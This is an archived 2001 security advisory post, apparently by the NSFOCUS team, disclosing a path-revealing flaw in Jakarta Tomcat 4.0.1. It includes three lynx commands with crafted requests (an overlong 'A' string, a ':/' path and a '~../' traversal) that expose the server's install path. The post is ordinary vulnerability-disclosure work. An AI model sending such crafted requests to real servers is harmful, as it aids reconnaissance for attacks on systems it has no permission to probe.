|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: analysist (analysist
nsfocus.com)Date: Thu Nov 22 2001 - 03:32:20 CST
Hello,
It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submiting an unusually long request(more than 222 bites) or a special crafted request, we can
get the web server's install path.
How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp
Tested version
-----------------------
Jakarta Tomcat v4.0.1
Microsoft Windows 2000
I sent this information to the vendor a week ago, but i have not received any reply!:(
Best Regards
analysistnsfocus.com
NSFOCUS Security Team <http://www.nsfocus.com>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]